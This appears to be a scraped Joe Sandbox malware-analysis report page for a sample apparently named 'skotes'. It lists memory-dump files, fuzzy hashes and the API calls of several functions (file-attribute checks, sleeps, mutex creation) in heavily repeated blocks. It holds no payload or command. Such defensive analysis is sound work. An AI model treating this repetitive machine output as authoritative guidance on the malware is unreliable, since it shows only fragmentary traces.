Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 5bb0a2f5f5fcfb6fe57c4ee716f8a7f1ec552352ff0469130fe60203429d130b
Instruction ID: 2701f112c0790f080fe084a431cb29543ca11d0fd73c41f2bc535c753f4b2432
Opcode Fuzzy Hash: 5bb0a2f5f5fcfb6fe57c4ee716f8a7f1ec552352ff0469130fe60203429d130b
Instruction Fuzzy Hash: 5B416DB5904304ABDB24EFB5DC459EFB7F9EF8A300B10462DF856D3610E6309A84EB21

Function 00BE9BA5 Relevance: 4.6, APIs: 3, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9BA8
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 3384aab619d4e2c6f524702824f725eb38f6064f697812484d40a9fe3828ed4c
Instruction ID: 6e2566b5badf1d626905e8baa44bc063610230465e0d00f4a086729b95221d98
Opcode Fuzzy Hash: 3384aab619d4e2c6f524702824f725eb38f6064f697812484d40a9fe3828ed4c
Instruction Fuzzy Hash: A23146717042849BEB18EB79DCC976DBBE6EFC6310F208298E0149B3D6C77599888751

Function 00BE9CDA Relevance: 4.6, APIs: 3, Instructions: 139
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9CDD
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 6a3aaf7bc13fa1e741135c6866d2084d691d2c627e3f7a481e42a211f2f39d4b
Instruction ID: b9eb3fdb1c855bd158ef08f2f121eca20afd2f899a00bb21f752d3e4963a2bc1
Opcode Fuzzy Hash: 6a3aaf7bc13fa1e741135c6866d2084d691d2c627e3f7a481e42a211f2f39d4b
Instruction Fuzzy Hash: 343137717142849BEB18DB69DCC87ADB7E6EFC6310F348298E014973D6C77599888721

Function 00BE9F44 Relevance: 4.6, APIs: 3, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BE9F47
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: dbe8abb1eec1b99650a552c53335f828df6d26e4cb18813b6115fe3412ce422d
Instruction ID: 2fcb4b1a3ab0ef6fe551b5f33c891f1a65d4e0188b576739b2bc3a2ddfff819f
Opcode Fuzzy Hash: dbe8abb1eec1b99650a552c53335f828df6d26e4cb18813b6115fe3412ce422d
Instruction Fuzzy Hash: 3A318D317102849BEB18DB79DCD87ACB7E6EFC6310F204298E014DB3D2C775A9888762

Function 00BEA079 Relevance: 4.6, APIs: 3, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA07C
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: a07efdcd411a1f86f9e3dee02ff0f27f823c3859c2ad08bfe523a0086e3b6183
Instruction ID: 7829c1948beb14e334c586636aa1a7bd5900bb49488f0812a214399449421e2e
Opcode Fuzzy Hash: a07efdcd411a1f86f9e3dee02ff0f27f823c3859c2ad08bfe523a0086e3b6183
Instruction Fuzzy Hash: 803128717102849BEB18DB79CCC976DB7EADFC6310F204299E014A73D6C775A9848713

Function 00BEA1AE Relevance: 4.6, APIs: 3, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA1B1
Sleep.KERNELBASE(00000064,?), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 6d25b435feef74c788f9b7dd8286491e51eac0140fe8947bd9fbd1f13e007bed
Instruction ID: 32f150f62507d466fd1fead333bb0caa6396e80675e730d4a06534996c2e6322
